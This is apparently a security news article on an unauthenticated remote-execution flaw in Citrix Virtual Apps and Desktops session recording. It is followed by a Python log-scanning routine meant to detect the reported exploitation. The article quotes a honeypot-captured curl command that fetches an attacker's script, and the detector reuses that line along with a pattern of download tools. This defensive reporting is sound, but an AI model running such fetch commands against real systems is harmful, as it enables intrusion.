A critical unpatched vulnerability has been found in Citrix Virtual Apps and Desktops, now being actively exploited. The flaw, revealed by Watchtowr Labs, poses a significant risk, especially in remote work environments like call centers.
All about the Vulnerability
Citrix Virtual Apps and Desktops allow remote users to access full desktop environments from devices like laptops, tablets, and smartphones.
However, Watchtowr Labs warns that attackers, including ransomware groups, could exploit this setup. Since all desktops are hosted on a single server, a privilege escalation exploit could give attackers access to the entire server and all connected sessions.
A concerning issue with Citrix’s solution is its session recording feature. Citrix lets admins record user sessions, but the review process relies on a vulnerable .NET deserialization function.
This flaw can be exploited without authentication, making it an easy target for cybercriminals. Watchtowr Labs has posted proof-of-concept exploit code on GitHub, making it available to anyone.
Sample Exploit Details:
A recent exploit, reported by SANS, shows the severity of the vulnerability. In a honeypot, a POST request was made to a Citrix system, attempting to execute a command that fetched a malicious script from an external server. The exploit targeted Citrix’s messaging queue (msmq/private$/citrixsmaudeventdata) and tried to run the following command:
curl http://91.212.166.60/script_xen80-mix.php
When SANS later tried to retrieve the script from that server, the request returned a 404 error, which suggests the attacker may be filtering requests by source IP or simply logging them for use in future attacks. The honeypot request itself came from IP address 192.143.1.40, linked to an ISP in Johannesburg, South Africa.
The unpatched vulnerability in Citrix Virtual Apps and Desktops is a serious threat, as it allows remote command execution without authentication, potentially compromising entire systems. Since all desktops are hosted on the same server, gaining control of one session could lead to control of all connected sessions.
Citrix has not released a patch for this vulnerability, and affected organizations should remain alert. Watchtowr Labs advises monitoring for unusual activity, particularly from unknown IP addresses, and suggests implementing additional security measures to reduce the risk.
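As an added example (not code from the article, SANS or Watchtowr Labs), the following routine applies the monitoring advice above to the honeypot pattern described earlier: it scans web-server log lines for POST requests to the Citrix session recording queue path and flags any that come from an unknown source or carry a download command in the body. The simplified log format and the "trusted" address are assumptions; the two attacker addresses are the ones quoted in the article.

```python
import re
from dataclasses import dataclass

# Constructed sample lines in an assumed "ip method path status "body"" format;
# not real honeypot data. The two external IPs are those quoted in the article.
SAMPLE_LOGS = [
    '192.143.1.40 POST /msmq/private$/CitrixSmAudEventData 200 '
    '"curl http://91.212.166.60/script_xen80-mix.php"',
    '10.0.0.12 GET /Citrix/StoreWeb/ 200 ""',
    '10.0.0.12 POST /msmq/private$/CitrixSmAudEventData 200 '
    '"<SessionEvent>...</SessionEvent>"',
]

# Queue path named in the article; matched case-insensitively.
QUEUE_PATH = "msmq/private$/citrixsmaudeventdata"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) (?P<method>\S+) (?P<path>\S+) (?P<status>\d{3}) "(?P<body>.*)"$'
)
# Download/execution helpers that have no business inside a session event.
CMD_RE = re.compile(
    r"\b(curl|wget|powershell|cmd\.exe|certutil|bitsadmin)\b", re.IGNORECASE
)


@dataclass
class Alert:
    ip: str
    path: str
    indicator: str


def analyze(lines, trusted_ips=frozenset()):
    """Return one Alert per suspicious POST to the session recording queue."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line; a real deployment would count these
        if m["method"] != "POST" or QUEUE_PATH not in m["path"].lower():
            continue
        # Only session hosts should ever post to this queue.
        if m["ip"] not in trusted_ips:
            alerts.append(Alert(m["ip"], m["path"], "untrusted source"))
        cmd = CMD_RE.search(m["body"])
        if cmd:
            alerts.append(Alert(m["ip"], m["path"], f"command in body: {cmd.group(0)}"))
    return alerts


if __name__ == "__main__":
    for a in analyze(SAMPLE_LOGS, trusted_ips=frozenset({"10.0.0.12"})):
        print(a)
```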